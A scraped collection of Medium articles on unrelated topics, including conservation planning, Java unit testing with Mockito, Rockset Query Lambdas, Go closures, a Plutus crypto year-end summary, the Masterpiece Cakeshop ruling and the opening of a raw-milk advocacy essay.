a reduction in behaviors driving threats e.g. replacing native monarch-friendly plant species with non-native ornamental species by community gardeners (behavior result)
a change in what is behind the behaviors driving the threats e.g. improved education about native plant species of community gardeners (contributing factor result)
2. Look Up
An organization’s collective impact of connected conservation strategies is the goal (instead of the collective impacts of unconnected strategies) — when all strategies work together, the impact reaches further!
This principle was easiest for me to grasp when I thought of it in terms of nested strategies. For example, the strategy for improving monarch populations (finest-scope) could be nested within the strategy for improving California butterfly populations (medium-scope), which could be nested within the strategy for improving lepidopteran (butterflies and moths) populations west of the Rockies (largest-scope). It all just fits (nests) so nicely!
3. Listen to the People
The people carrying out behaviors that negatively impact biodiversity need to be part of the conversation in order for their behaviors to be fully understood and to come up with solutions they will participate in. Nowadays, the direct and indirect threats to biodiversity tend to be caused by people and their activities — think deforestation, poaching, and invasive species. Gone are the days where the most influential factors were volcanoes, meteorites, and ice ages.
4. Do No Harm
Seemingly simple, but certainly not easy, this principle aims to minimize any negative impacts on both people and wildlife that conservation efforts may incur. For example, perhaps habitat restoration to conserve an endangered Species A degrades habitat that is important for an endangered Species B… harm! Or, also in this scenario, the livelihood of the local community is negatively impacted because the land being restored was being used to grow lucrative crops… harm!
5. Think Big
Given a specific timeframe, conservationists should strive to maximize conservation impact through their strategies. Nobody has time for the easy-pickings of low-hanging fruit! Reach higher and harder to get the juiciest reward.
6. Look Forward
The world, the climate, and local conditions are constantly changing… and an effective strategy anticipates these changes and accounts for them to the best of its ability — as WildTeam puts it, strategies should be “future-proof”. It doesn’t do a biodiversity target any good if political, technological, or stakeholder changes can stop the achievement of conservation impact. | https://medium.com/@nataliemrhoades/strategy-development-for-the-budding-wildlife-conservationist-550422643939 | ['Natalie Rhoades'] | 2020-12-22 03:46:56.799000+00:00 | ['Skills Development', 'Project Management', 'Strategy', 'Planning', 'Conservation'] |
À venir : Un nouveau design !. Nous allons très prochainement déployer… | Inbound Marketing Manager @ Wooclap, interested in and excited about applying EdTech to the educational needs of today’s students
Follow | https://medium.com/wooclapfr/%C3%A0-venir-un-nouveau-design-72eefd1e21e7 | ['Gauthier Lebbe'] | 2019-03-18 07:51:27.527000+00:00 | ['Ecole', 'News', 'Innovation', 'Education', 'Presentations'] |
Even Leaders in Diversity, Equity and Inclusion Sometimes Get It Wrong | Aysha H. Khoury, M.D., was suspended from her role in August as an educator and clinician at Kaiser Permanente Bernard J. Tyson School of Medicine, an organization that was built on the principles of health equity. The school asked Khoury to teach a course about racism and maternal health, but abruptly ended it and suspended her without warning this summer. Although an investigation into her dismissal found no fault with Khoury, Kaiser only reinstated her as a clinician, a move that is profitable for the school. She is still barred as an educator there and has yet to get a reason why.
Aysha H. Khoury, M.D.
I can only assume that this has something to do with President Trump’s recently introduced penalties for contractors who offer diversity training. Any organization that receives federal funds while violating the order — i.e., teaching diversity and inclusion — can be blacklisted from government contracts (e.g., Medicare and Medicaid payments or grant funding), among other punishments. Perhaps Kaiser panicked after learning of the ruling and suspended Khoury out of an abundance of caution and to avoid the risk of being penalized as a result of the executive order?
I wish I could say I’m surprised, but too often, BIPOC people’s careers become collateral damage in organizations who fumble diversity initiatives. Companies tend to retaliate against the very people they have recruited, in both subtle and dramatic ways. The organizations that waited until this year to implement diversity, equity and inclusion training have often burdened their Black employees with leading diversity reviews, even if they are not prepared or skilled to take on this extra work. And people of color who are hired in mostly white organizations often experience racialized tensions that lead to them being pushed out of their workplaces or quitting to find more supportive work environments.
I’ve experienced it personally.
Trump’s legislation is spiteful, abhorrent and scary, and the president-elect should overturn it as soon as he can. That said, it does not excuse Kaiser from negating its diversity, equity and inclusion efforts and throwing a Black female physician under the bus in the interest of complying. It is this very type of action that can perpetuate systemic racism and no amount of politically correct tweeting after the fact will rectify the situation.
Ending racism is not a comfortable process. It requires work, even if that work is painful.
If you are a healthcare leader and are struggling with a similar situation, consider contracting with an objective, external mediator before pressing pause on a vital program or dismissing a key hire that is working to dismantle racism and prevent disparities. An arbitrary third-party administrator can provide objective feedback to get to a point of resolution. At the same time, your human resources and media relations departments should be protecting your organization but properly balancing the need to support employees and manage risks from external threats.
It has become very trendy this year for healthcare organizations to talk about the importance of diversity, equity, inclusion and anti-racism education, without actually living up to those messages. Moving forward, I hope the school immediately reinstates Dr. Khoury’s position and takes steps to prevent any similar missteps.
Please consider signing this petition to reinstate Khoury. | https://medium.com/just-health-collective/even-leaders-in-diversity-equity-and-inclusion-sometimes-get-it-wrong-f950237aee6f | ['Duane Reynolds'] | 2020-12-22 17:42:36.322000+00:00 | ['Healthcare', 'Diversity And Inclusion', 'Racism', 'Diversity', 'Health Equity'] |
The devil that is @SpringBootTest! | I’ve seen a lot of developers claiming one of the “Cool features” of Spring is that it simplifies your unit tests by introducing @SpringBootTest. Now that’s just not true and I think it was not the intention of Spring also! Now let’s first get into what is a “Unit Test” and what is “Not a Unit Test”. I don’t want to be a Word Nazi here, but I have seen this leading to usage of @SpringBootTest on every Unit Test and no one wants that!
To explain the problem, let’s take a step back and see how we [should] test our applications. We have two completely different types of tests on the two ends of a stick, we have “End-To-End Integration Tests” where [hopefully] nothing is mocked and our application will be tested as close as possible to the way it is run in production. Now if these tests passed, then we will say our application is ready! On the other end of the stick, we have “Unit Tests” where one unit of work is tested and everything other than that unit of work is mocked during the test. QAs want to test everything exactly the same way as it is in production (as they should!). But that comes with a cost! Tests will be heavy. Now, us developers want to get a “quicker result” on whether we broke anything by the change we just made or not. So we start “assuming”. We just remove some of the elements of an Integration Test and replace them with something we control. This way we will have more control over the test and we it will be faster also. The more we assume, the more control we have and the faster our tests become. This continues until we reach Unit Tests where we control everything! Basically we will say “assuming this request comes in and DB does that and etc., I expect these to happen”.
For example let’s say I am implementing a “Register User” service method. I will try to make this a bit more real-world to emphasize on how DDD has eased our life here also!
Business expert says when registering a user, I should make sure that the user doesn’t already exist in our DB, then generate an activation link for this user and email the generated activation link to him/her.
Now using DDD, I will translate this to:
I should make sure that the user doesn’t already exist in our User Store, then generate an activation code for this user and send the generated activation code to him/her.
package ir.amv.snippets.unittestdemo;
import java.util.UUID;
import lombok.RequiredArgsConstructor;
/**
* @author Amir
*/
@RequiredArgsConstructor
public class UserService {
private final UserRepository userRepository;
private final ActivationCodeSender activationCodeSender;
public void registerUser(String email) {
userRepository.findByEmail(email)
.ifPresent(user -> {
throw new IllegalArgumentException(String.format("User %s already exists", email));
});
String activationCode = UUID.randomUUID().toString();
activationCodeSender.send(email, activationCode);
userRepository.saveUser(email, activationCode);
}
}
Now, in production, User Store will be our DB (also easily replaceable by an Active Directory User Store thanks to DDD), and sending the activation code will be done by emailing an activation link to the user. This is what happens in Integration Tests. In my Unit Tests however, I can “assume” that the User Store will for example say this user doesn’t already exist. Then expect a generated code to be passed to be sent. I don’t need Spring here. Actually everything other than my UserService should be mocked.
Mockito has some usefull annotations for this. Let’s build my unit test step by step. First we will create our unit test. You should read this as “create mock objects for UserRepository and ActivationCodeSender, and then create an instance of UserService by calling its biggest constructor passing the mocked objects”.
package ir.amv.snippets.unittestdemo;
import static org.junit.jupiter.api.Assertions.*;
import static org.mockito.Mockito.*;
import org.junit.jupiter.api.Nested;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.junit.jupiter.MockitoExtension;
@ExtendWith(MockitoExtension.class)
class UserServiceTest {
@Mock
private UserRepository userRepository;
@Mock
private ActivationCodeSender activationCodeSender;
@InjectMocks
private UserService underTest;
}
Now, I want to create Unit Tests for my register method. I will create a Nested class for tests related to this method because in our business case, we have two different scenarios, existing user and none-existing user.
class UserServiceTest { // not shown @Nested
class registerUser {
@Test
void givenExistingUser() {
// given
// when
// then
}
@Test
void givenNoneExistingUser() {
// given
// when
// then
}
}
}
The first case is easy. If user is an existing user, I should get an IllegalArgumentException:
@Test
void givenExistingUser() {
// given
String email = "doesn't really need to be an email because we CONTROL everything!";
when(userRepository.findByEmail(eq(email))).thenReturn(Optional.of(mock(User.class)));
// when & then
assertThrows(IllegalArgumentException.class,
() -> underTest.registerUser(email));
}
And for none-existing user:
@Test
void givenNoneExistingUser() {
// given
String email = "doesn't really need to be an email because we CONTROL everything!";
when(userRepository.findByEmail(eq(email))).thenReturn(Optional.empty());
// when
underTest.registerUser(email);
// then
verify(userRepository).saveUser(eq(email), anyString());
verify(activationCodeSender).send(eq(email), anyString());
}
And that’s it. Now if you like and agree with this way of implementing Unit Tests and are using Intellij IDEA, you can use this template as your default JUnit 5 test class which will come in handy when you Alt+Enter on a class and select “Create Test”: | https://medium.com/swlh/the-devil-that-is-springboottest-68b7f4148bb6 | ['Amir Mohammad Vosough'] | 2020-05-03 23:01:38.966000+00:00 | ['Unit Testing', 'Junit 5', 'Spring Boot', 'Integration Testing'] |
Bittersweet | That’s exactly what Venezuela have become.
You go for the full roller coaster experience, in a matter of seconds you can go from being incredibly happy after spending some time with amazing people you just meet, to completely broken-hearted after running into an old friend who’s struggling due to the serious economic crisis in the country.
From enjoying delicious food with the family, feeling “full” and paying the bill taking advantage of a favourable exchange rate, to realising there’s people that can barely eat once a day, because of that same exchange rate.
From the desire to go to the beach or take your family somewhere nice, to just avoid both due to the severe insecurity.
From enjoying every second with the people you love, to remembering I will leave and they will stay there.
It is bittersweet for a guy like me, who luckily have the chance to get out.
For those that have to stay, there’s nothing sweet. It’s all bitter. | https://medium.com/thoughts-on-the-go-journal/bittersweet-7be137496251 | ['Joseph Emmi'] | 2016-08-15 21:35:55.821000+00:00 | ['Life', 'Personal', 'Venezuela', 'Journal'] |
Query Lambdas: Increasing Developer Velocity for Application Development | At Rockset we strive to make building modern data applications easy and intuitive. Data-backed applications come with an inherent amount of complexity — managing the database backend, exposing a data API (often using hard-coded SQL or an ORM to write queries), keeping the data and application code in sync… the list goes on. Just as Rockset has reimagined and dramatically simplified the traditional ETL pipeline on the data-loading side, we’re now proud to release a new product feature — Query Lambdas — that similarly rethinks the data application development workflow.
Application Development on Rockset: Status Quo
The traditional application development workflow on Rockset has looked something the the following:
Step 1: Construct SQL query in the Rockset Console
For this case, let’s use the sample query:
SELECT
`event, event_time`
FROM
"User-Activity"
WHERE
userId = '...
AND event_time > CURRENT_TIMESTAMP() - DAYS(5) -- select events for a particular user in the last 5 daysSELECT`event, event_time`FROM"User-Activity"WHEREuserId = '... @rockset .com'AND event_time > CURRENT_TIMESTAMP() - DAYS(5)
Step 2: Substitute out hard-coded values or add filters manually using Query Parameters
Let’s say we want to generalize this query to support arbitrary user emails and time durations. The query SQL would look something like this:
-- select events for any particular user in the last X days
SELECT
event, event_time
FROM
"User-Activity"
WHERE
userId = :userId
AND event_time > CURRENT_TIMESTAMP() - DAYS(:days)
Step 3: Hardcode raw SQL into your application code along with parameter values
For a Node.js app using our Javascript client, this code would look something like:
client.queries
.query({
sql: {
query: `SELECT
event, event_time
FROM
"User-Activity"
WHERE
userId = :userId
AND event_time > CURRENT_TIMESTAMP() - DAYS(:days)`,
},
parameters: [
{
name: 'userId',
type: 'string',
value: '...',
},
{
name: 'days',
type: 'int',
value: '5',
},
],
})
.then(console.log);
While this simple workflow works well for small applications and POCs, it does not accommodate the more complex software development workflows involved in building production applications. Production applications have stringent performance monitoring and reliability requirements. Making any changes to a live application or the database that serves that application needs to be given the utmost care. Production applications also have stringent security requirements and should prevent bugs like SQL injection bug at all costs. Some of the drawbacks of the above workflow include:
Raw SQL in application code: Embedding raw SQL in application code can be difficult — often special escaping is required for certain characters in the SQL. It can even be dangerous, as a developer may not realize the hazards of using string interpolation to customize their query to specific users / use-cases as opposed to Query Parameters and thus create a serious vulnerability.
Embedding raw SQL in application code can be difficult — often special escaping is required for certain characters in the SQL. It can even be dangerous, as a developer may not realize the hazards of using string interpolation to customize their query to specific users / use-cases as opposed to Query Parameters and thus create a serious vulnerability. Managing the SQL development / application development lifecycle: Simple queries are easy to build and manage. But as queries get more complex, expertise is usually split between a data team and an application development team. In this existing workflow, it is hard for these two teams to collaborate safely on Rockset — for example, a database administrator might not realize that a collection is actively being queried by an application and delete it. Likewise, a developer may tweak the SQL (for example, selecting an additional field or adding an ORDER BY clause) to better fit the needs of the application and create a 10–100x slowdown without realizing it.
Simple queries are easy to build and manage. But as queries get more complex, expertise is usually split between a data team and an application development team. In this existing workflow, it is hard for these two teams to collaborate safely on Rockset — for example, a database administrator might not realize that a collection is actively being queried by an application and delete it. Likewise, a developer may tweak the SQL (for example, selecting an additional field or adding an ORDER BY clause) to better fit the needs of the application and create a 10–100x slowdown without realizing it. Query iteration in application code: Can be tedious — to take advantage of the bells and whistles of our SQL Editor, you have to take the SQL out of the application code, unescape / fill parameters as needed, put it into the SQL editor, iterate, reverse the process to get back into your application and try again. As someone who has built several applications and dashboards backed by Rockset, I know how painful this can be :D
Can be tedious — to take advantage of the bells and whistles of our SQL Editor, you have to take the SQL out of the application code, unescape / fill parameters as needed, put it into the SQL editor, iterate, reverse the process to get back into your application and try again. As someone who has built several applications and dashboards backed by Rockset, I know how painful this can be :D Query metrics: Without custom implementation work application-side, there’s no way to understand how a particular query is or is not performing. Each execution, from Rockset’s perspective, is entirely independent of every other execution, and so no stats are aggregated, no alerts or warnings configurable, and any visibility into such topics must be implemented as part of the application itself.
Application / Dashboard Development on Rockset with Query Lambdas
Query Lambdas are named parameterized SQL queries stored in Rockset that can be executed from a dedicated REST endpoint. With Query Lambdas, you can:
version-control your queries so that developers can collaborate easily with their data teams and iterate faster
avoid querying with raw SQL directly from application code and avoid SQL injection security risks by hitting Query Lambda REST endpoints directly, with query parameters automatically turned into REST parameters
write a SQL query, include parameters, create a Query Lambda and simply share a link with another application developer
see which queries are being used by production applications and ensure that all updates are handled elegantly
organize your queries by workspace similarly to the way you organize your collections
create / update / delete Query Lambdas through a REST API for easy integration in CI / CD pipelines
Using the same example as above, the new workflow (using Query Lambdas) looks more like this:
Step 1: Construct SQL query in the Console, using parameters now natively supported
Step 2: Create a Query Lambda
Step 3: Use Rockset’s SDKs or the REST API to trigger executions of that Query Lambda in your app
Example using Rockset’s Python client library:
from rockset import Client, ParamDict
rs = Client() qlambda = rs.QueryLambda.retrieve(
'myQueryLambda',
version=1,
workspace='commons')
params['days'] = 5
params['userId'] = '... params = ParamDict()params['days'] = 5params['userId'] = '... @rockset .com' results = qlambda.execute(parameters=params)
Example using REST API directly (using Python’s requests library):
"parameters": [
{ "name": "userId", "value": "..." },
{ "name": "days", "value": "5" }
]
}''')
r = requests.post(
'https://api.rs2.usw2.rockset.com/v1/orgs/self/ws/commons/queries/{queryName}/versions/1',
json=payload,
headers={'Authorization': 'ApiKey ...'}
) payload = json.loads('''{"parameters": [{ "name": "userId", "value": "..." },{ "name": "days", "value": "5" }}''')r = requests.post(json=payload,headers={'Authorization': 'ApiKey ...'}
Let’s look back at each of the shortcomings of the ‘Status Quo’ workflow and see how Query Lambdas address them:
Raw SQL in application code: Raw SQL no longer ever needs to live in application code. No temptation to string interpolate, just a unique identifier (query name and version) and a list of parameters if needed that unambiguously resolve to the saved SQL. Each execution will always fetch fresh results — no caching or staleness to worry about.
Raw SQL no longer ever needs to live in application code. No temptation to string interpolate, just a unique identifier (query name and version) and a list of parameters if needed that unambiguously resolve to the saved SQL. Each execution will always fetch fresh results — no caching or staleness to worry about. Managing the SQL development / application development lifecycle: With Query Lambdas, a SQL developer can write the query, include parameters, create a Query Lambda and simply share a link (or even less — the name of the Query Lambda alone will suffice to use the REST API) with an application developer. Database administrators can see for each collection any Query Lambda versions that use that collection and thus ensure that all applications are updated to newer versions before deleting any underlying data.
With Query Lambdas, a SQL developer can write the query, include parameters, create a Query Lambda and simply share a link (or even less — the name of the Query Lambda alone will suffice to use the REST API) with an application developer. Database administrators can see for each collection any Query Lambda versions that use that collection and thus ensure that all applications are updated to newer versions before deleting any underlying data. Query iteration in application code: Query iteration and application iteration can be entirely separated. Since each Query Lambda version is immutable (you cannot update its SQL or parameters without also incrementing its version), application functionality will remain constant even as the Query Lambda is updated and tested in staging environments. To switch to a newer or older version, simply increment or decrement the version number in your application code.
Query iteration and application iteration can be entirely separated. Since each Query Lambda version is immutable (you cannot update its SQL or parameters without also incrementing its version), application functionality will remain constant even as the Query Lambda is updated and tested in staging environments. To switch to a newer or older version, simply increment or decrement the version number in your application code. Query metrics: Since each Query Lambda version has its own API endpoint, Rockset will now automatically maintain certain statistics and metrics for you. To start with, we’re exposing for every version: Last Queried (time), Last Queried (user), Last Error (time), Last Error (error message). More to come soon!
Summary
We’re incredibly excited to announce this feature. This initial release is just the beginning — stay tuned for future Query Lambda related features such as automated execution and alerting, advanced monitoring and reporting, and even referencing Query Lambdas in SQL queries.
As part of this release, we’ve also added a new Query Editor UI, new REST API endpoints and updated SDK clients for all of the languages we support. Happy hacking!
More you’d like to see from us? Send us your thoughts at product[at][rockset.com] | https://medium.com/rocksetcloud/query-lambdas-increasing-developer-velocity-for-application-development-314a09a69a9e | ['Scott Morris'] | 2020-03-28 20:59:42.014000+00:00 | ['Sql', 'Application Development', 'Lambda', 'Database', 'Developer'] |
ProgrammingTechniques in Go: Closures | The Go gopher was designed by Renee French. (http://reneefrench.blogspot.com/)
gopher.{ai,svg,png} was created by Takuya Ueda (https://twitter.com/tenntenn). Licensed under the Creative Commons 3.0 Attributions license.
This is the first article in a series about basic programming techniques as illustrated in Go. Recently I was explaining closures to a colleague who was a recent CS grad. They were not really clear on closures in general. It occurred to me that for folks who work mostly in object oriented languages, some functional techniques may not be super clear. I figured some articles about that could help some people. In addition, I struggled trying to define a closure presisely without examples. I wanted to be able to do that. Recently I watched a talk by Bill Kennedy and his precision of language really stood out to me.
As I considered writing about some of the fundementals of our trade, I started thinking about basic programming concepts like the composable parts of language. In linguistics, a morpheme is the smallest part of language that has inherent meaning. In English an example is the suffix “able”, meaning “capable of.” We all use morphemes all the time. We even know how to make up new works using these existing components, but we may not know how to precisely describe what we are doing. I knew how to write a closure, but it was difficult for me to explain it well.
Closures are a means of lexical scoping and abstraction in languages where functions are first class values. That sounds more complex than it really is. Let’s look an example.
Closure Example
Before I jump in I want to make it clear that we could totally do this using a struct that has a field instead. As with most problems, there are multiple solutions and each has it’s benefits and risks. This post isn’t really about the benefits of functional programming so I won’t go into that here, but there is some good information available.¹ ² In fact, closures are probably not the best way to write our client, but I will leave that as exercize for the reader to determine.
In our example, we have a client. A client that needs to be initialized with a url. We use our closure to create the client and “close” around it. Internally we are creating a client struct, but it’s hidden to the caller. This is kind of a weird example let’s look at a great example in Go.
In this example, we are creating a server. We have a closure in the function AccessLogger . This is a super common pattern in Go. We close around the logger and return a HandlerFunc. That way we can pass the server a standard handler and we can access our logger, or whater else you want to pass.
So essentially, a closure is a function that returns another function and provides that inner funtion access to some variable. That inner variable is immutable too so you don’t have to worry about it changing!
That’s about it. I like closures a lot. I think they are elegant and fun to use. I would love to hear what you think or if you have any suggestions for additional topics. | https://medium.com/@guygrigsby/programmingtechniques-in-go-closures-d6cea313d14 | ['Guy J Grigsby'] | 2021-09-14 13:53:42.466000+00:00 | ['Lambda', 'Programming', 'Closure', 'Go', 'Functional Programming'] |
Plutus — 2020 End of Year Summary | Another year in crypto and we have witnessed unprecedented ATHs of Bitcoin, another halving, and institutional acceptance that many have predicted from the early cypherpunk days of Bitcoin. These are exciting times for all involved and we are proud to be part of the biggest financial revolution of the decade (and century) alongside early adopters and new risk-averse users discovering the technology.
Whether you have recently heard of Plutus or are one of our community veterans, here is an overview of 2020.
What Has Plutus Accomplished in 2020?
1) Growth
Awareness
We have seen a huge uptick in awareness of the Plutus app, something that has snowballed over the year due to the organic nature of our marketing. This year, the number of website impressions in Q4 has increased by 749% compared to the year prior. Likewise, clicks have increased by 1,160% and some of our tight-knit community channels have jumped more than 10-fold.
User Base
Whilst Bitcoin climbed meteoric amounts in value from sub $5k up to new ATH’s of $28,000+; the team has seen similar growth to our user base. Over 26,000 Plutus Accounts have now been created, which is slightly higher than our forecasts shared in our roadmap. We expect to see this rise to 150,000 users by the end of next year, each using the app for everyday payments and the benefits of its native rewards token, Pluton (PLU).
2) Product
PlutusDEX On Mobile
It is easy to overlook the significance of this.
Typically, DEXs facilitate crypto-crypto transactions, and these exchanges are very rarely seen on mobile due to technical challenges.
Plutus has built potentially the first crypto-fiat DEX and integrated this into our mobile app so users can swap assets on-the-go.
As a result, over $2.75m in value has passed through the DEX, enabling seamless in-store or online payments utilising crypto.
Full Blog >
Pluton Rewards
This year, Pluton Rewards became a reality and Premium/Pro members have been earning 3% in crypto on every single Plutus Card purchase.
Users quickly acquired over $100,000 worth of rewards since its arrival, all without obligatory staking. The majority of our users save significantly more in rewards than the incurred monthly subscription fee for a Premium account now priced at £/€ 9.99 per month.
There are a total of 20m PLU, out of which 1.85m Pluton reward tokens have already come into circulation, and the remaining tokens are locked away only to be distributed to Plutus Card users via our 3% crypto rewards feature over many decades.
See how much you can earn?
Plutus Perks
In order to deliver more value to holders of our rewards token, we released Plutus Perks; a feature that offers additional rewards in both cash and crypto (up to 15%) to those who optionally stake PLU.
We now offer huge earnings at universally popular brands such as Amazon, Apple, Sky, Nike, and more. This is another step towards increasing the utility of PLU.
This programme has evolved over the year with the introduction of External Staking in a non-custodial manner, another rarely seen and innovative addition to Plutus’ feature set.
Full Perks Breakdown >
3) Operational
Pluton Liquidity Injection Programme (PLIP)
One of the biggest priorities of 2020 was increasing awareness of the Plutus app and accessibility of our native rewards token, Pluton (PLU). In September, we launched the Pluton Liquidity Injection Programme (PLIP), a plan approved by our community that involved numerous exchange listings and the reallocation of PLU.
PlutusDEX Sale
This commenced with a sale event on our own internal PlutusDEX where 100,000 PLU was pledged for by the general public and community members. This was oversubscribed within 48hrs and extended to accommodate the demand, whereby it was oversubscribed a second time before concluding.
Full Blog >
Listings
At the start of this year, PLU was not available on any Tier 1 exchanges as the concept for our decentralised loyalty rewards system was still in development. Since it’s release, PLU has arrived on Bitfinex, BitMax, KuCoin, and several other well-known exchanges making it largely more accessible for people to obtain and use for its in-app benefits.
What’s to Come in 2021?
Pluton Liquidity Injection Programme (PLIP)
Although PLIP is set to conclude on Jan 11th once the minimum PLU price-floor is lifted, our awareness campaign will continue. We have several more exciting Tier 1 listings, partnerships, and co-branding plans in the pipeline.
We have also successfully increased the token utility in 2020 by providing multiple money saving-features for those that stake PLU. Making PLU readily available across both internal and external markets is an important progression for the product, something which is still underway.
Prior to PLIP, the monthly conversion limit of PLU was set at £/€ 200. Since then, it has risen to £/€ 700 per month, and the daily limit set at £/€ 30 to enable everyday purchases. We will continue to evaluate and raise both these limits in the new year as the transaction frequency grows in parallel to our user base.
Expanding Internationally
Plutus has established a strong foothold in the UK/EEA market and we plan to rapidly expand our user-base within these regions. We will also be breaking into Asia and Latin America where we have seen considerable interest.
Banking License Pursuit
Obtaining a banking license and overcoming the multitude of legal red tape is a lengthy process, and Plutus has already commenced with the first steps. 2021 will involve jumping through numerous challenging hoops before reaching our long-term goal of becoming a non-custodial crypto bank the following year.
Plutus 3.0
Plutus has never been shy of delivering world-first features, and next year you can look forward to plenty of exciting ones! Here is what we plan to deliver in the first few months of 2021:
Product Features
An iteration of our current app but with a more streamlined UX and a design overhaul to support new features.
Bitcoin-Fiat DEX
Whilst ERC-20 DEX’s are commonplace, Bitcoin integration would be another rare feature to become available to all Plutus members on both the web and mobile app. Although originally planned for December, the highly anticipated Bitcoin-Fiat DEX will now be arriving in Q1.
Plutus Wallet Extension
We will be releasing our very own wallet extension. Think of this as Plutus’ very own MetaMask but with the addition of Bitcoin.
Altcoin Accessibility
Alternative blockchains other than Bitcoin and Ethereum will be connectable to the Plutus Card.
PlutusDEX Pool & Earn
Staying true to the original concept of the Plutus white paper, the PlutusDEX will enable our members to pool together to become liquidity providers and earn a percentage back in rewards. | https://medium.com/plutus/plutus-2020-end-of-year-summary-97ca7e49dd49 | [] | 2020-12-30 09:53:54.252000+00:00 | ['Ethereum', 'Bitcoin', 'Cryptocurrency', 'Fintech', 'Announcements'] |
In Masterpiece, the Bakery Wins the Battle but Loses the War | In Masterpiece, the Bakery Wins the Battle but Loses the War
The court narrowly ruled for the bakery, but reaffirmed states can bar businesses from discriminating against LGBT people.
By James Esseks, Director, ACLU Lesbian Gay Bisexual Transgender & HIV Project
JUNE 4, 2018 | 4:15 PM
In the Masterpiece Cakeshop case, the Supreme Court today ruled for a bakery that had refused to sell a wedding cake to a same-sex couple. It did so on grounds that are specific to this particular case and will have little to no applicability to future cases. The opinion is full of reaffirmations of our country’s longstanding rule that states can bar businesses that are open to the public from turning customers away because of who they are.
The case involves Dave Mullins and Charlie Craig, a same-sex couple who went to the Masterpiece Cakeshop in Denver in search of a cake for their wedding reception. When the bakery refused to sell Dave and Charlie a wedding cake because they’re gay, the couple sued under Colorado’s longstanding nondiscrimination law. The bakery claimed that the Constitution’s protections of free speech and freedom of religion gave it the right to discriminate and to override the state’s civil rights law. The Colorado Civil Rights Commission ruled against the bakery, and a state appeals court upheld its decision.
In reversing the lower court’s ruling, the Supreme Court focused on how this particular case was handled by the commission, which decides cases under Colorado’s nondiscrimination law. The court detailed concerns about comments from some of the Colorado commissioners that they believed revealed anti-religion bias. Because of that bias, the court held that the bakery wasn’t treated fairly when the commission decided the discrimination claim.
But — despite arguments from the Trump administration and other opponents of LGBT equality — the court didn’t decide that any business has a right to discriminate against customers because of who they are. Instead, the court’s decision affirms again and again that our nation’s laws against discrimination are essential to maintaining America’s open society and that states can pass and enforce those laws, including in the context of LGBT people.
First, the court reaffirmed that lesbian, gay, and bisexual people are entitled to equal dignity. The ruling makes clear that it “is unexceptional that Colorado law can protect gay persons, just as it can protect other classes of individuals, in acquiring whatever products and services they choose on the same terms and conditions as are offered to other members of the public.” The decision continues:
“Our society has come to the recognition that gay persons and gay couples cannot be treated as social outcasts or as inferior in dignity and worth. For that reason the laws and the Constitution can, and in some instances must, protect them in the exercise of their civil rights. The exercise of their freedom on terms equal to others must be given great weight and respect by the courts.”
The court also reaffirmed its longstanding rule that states can prevent the harms of discrimination. It noted that while the “religious and philosophical objections” of business owners:
“are protected, it is a general rule that such objections do not allow business owners and other actors in the economy and in society to deny protected persons equal access to goods and services under a neutral and generally applicable public accommodations law.”
The court further recognized the danger of free speech and freedom of religion claims that the bakery advanced in this case, stating that:
“any decision in favor of the baker would have to be sufficiently constrained, lest all purveyors of goods and services who object to gay marriages for moral and religious reasons in effect be allowed to put up signs saying ‘no goods or services will be sold if they will be used for gay marriages,’ something that would impose a serious stigma on gay persons.”
The decision also recognizes that adopting a rule — as advocated by the bakery — that would allow businesses to turn gay people away carries a significant risk of harm. It outlines its own fear that “a long list of persons who provide goods and services for marriages and weddings might refuse to do so for gay persons.” This would result, the decision continues, “in a community-wide stigma inconsistent with the history and dynamics of civil rights laws that ensure equal access to goods, services, and public accommodations.”
Significantly, the court cited an earlier case, Newman v. Piggie Park Enterprises, Inc., where it rejected precisely the kind of claims that the bakery made here. Piggie Park was a chain of barbeque restaurants in Columbia, South Carolina, that claimed its religion required it to refuse to serve Black customers alongside white ones and that applying the 1964 Civil Rights Act would violate its religious freedom. The courts rejected that argument, with the Supreme Court calling it “frivolous.”
The court today ruled for the bakery because it “was entitled to the neutral and respectful consideration of [its] claims in all the circumstances of the case,” and the justices in the majority believed the bakery didn’t receive that basic fairness. The court reminded us that “these disputes must be resolved with tolerance, without undue disrespect to sincere religious beliefs, and without subjecting gay persons to indignities when they seek goods and services in an open market.”
All of us deserve a dispassionate evaluation of our claims, either when we face discrimination or are accused of it. Those are principles we can all agree on.
Today’s decision gives a very narrow win to the bakery. But the court has clearly signaled that the broader rule the bakery was seeking here — a constitutional right to discriminate and turn customers away because of who they are — is not in keeping with American constitutional tradition.
There are many other cases in the pipeline that may soon give the court the opportunities to sort through the legal issues at the center of the Masterpiece Cakeshop case. One is Ingersoll v. Arlene’s Flowers, in which a florist shop refused to sell flowers to a gay couple for their wedding. The Washington state Supreme Court ruled unanimously that the shop had no constitutional right to turn the couple away, and a petition for review by the U.S. Supreme Court remains pending.
In the meantime, Congress should pass the Equality Act, which would update our civil rights laws to provide all people with full protection from discrimination. Here at the ACLU, we will continue working to ensure that the Supreme Court strikes the right balance between equality and the freedoms of speech and religion. In today’s decision, the court reaffirmed that the latter should not be used to undermine the former. | https://medium.com/aclu/in-masterpiece-the-bakery-wins-the-battle-but-loses-the-war-d0cbe7f79508 | ['Aclu National'] | 2018-06-04 20:32:21.007000+00:00 | ['Religion', 'LGBTQ', 'LGBT Rights', 'Speak Freely', 'Supreme Court'] |
Don’t kill the milk: The raw story behind real milk | Don’t kill the milk: The raw story behind real milk
This great image by DodgertonSkillhause
Traditional foods have health maintenance properties, and in some cases they actually have healing properties. Milk is one of these foods; however, there is a sort of milk madness going around — constant controversy over our dietary rights concerning this source of nutrition.
It’s distressing and slightly terrifying that we live in a world where the food we eat — the most basic human necessity — is being controlled by a certain few commercial entities. Some of whom now hold legal patents on everything from food crops to hormones.
No matter what your political or religious inclinations are, we should all be able to agree that we do not own the Earth.
We inhabit this planet, we did not create it, and by now we should have learned that we cannot perfect what nature provides. Furthermore, no singular entity should have the right to purchase, or claim entirely for itself, “products” that nature has made. To make it very simple, the Earth should be recognized as a free, emancipated, liberated and unbound entity which holds the “patents” on her own creations.
Nature gives us sustenance free of charge — the Earth comes equipped with everything that all life forms need to survive, and as a sweet bonus our natural foods come with built-in healing properties to ensure that we don’t just survive, we thrive.
Food is not a privilege it is a rightful endowment — a fair allowance for every living creature. Our food choices should be a non-issue, like breathing the air or drinking the water.
In our lifetime however, our fundamental right of food choice is being taken from us. Countless natural foods have become extinct due to modern development and agricultural practices, and most other basic foods have been modified, hybridized, artificilized, homogenized and pasteurized to a point of alienation to our body’s natural digestive process. In essence we are being robbed of what is rightfully ours — the choice of what foods to fuel and heal our bodies with.
